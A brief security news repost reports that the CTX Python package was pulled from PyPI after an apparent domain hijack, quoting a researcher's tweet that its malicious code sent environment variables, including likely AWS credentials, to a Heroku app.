Malicious Python library CTX removed from PyPI repo.
A suspicious developer appears to have performed a domain hijack to take over the original project
A malicious and potentially hijacked Python package, CTX, has been removed from the Python Package Index (PyPI) repository after social media users alerted the team to its presence.
On May 24, Indian hacker Somdev Sangwan alerted developers on Twitter to a potential security issue impacting Python’s CTX library. In a tweet, Sangwan said:
Python’s CTX library and a fork of PHP’s phpass have been compromised. Three million users combined. The malicious code sends all the environment variables to a Heroku app, likely to mine AWS credentials.
Environmental variables can also include other forms of credentials and API keys.
https://portswigger.net/daily-swig/malicious-python-library-ctx-removed-from-pypi-repo
@cRyPtHoN_INFOSEC_IT
@cRyPtHoN_INFOSEC_FR
@cRyPtHoN_INFOSEC_EN
@cRyPtHoN_INFOSEC_DE
@BlackBox_Archiv
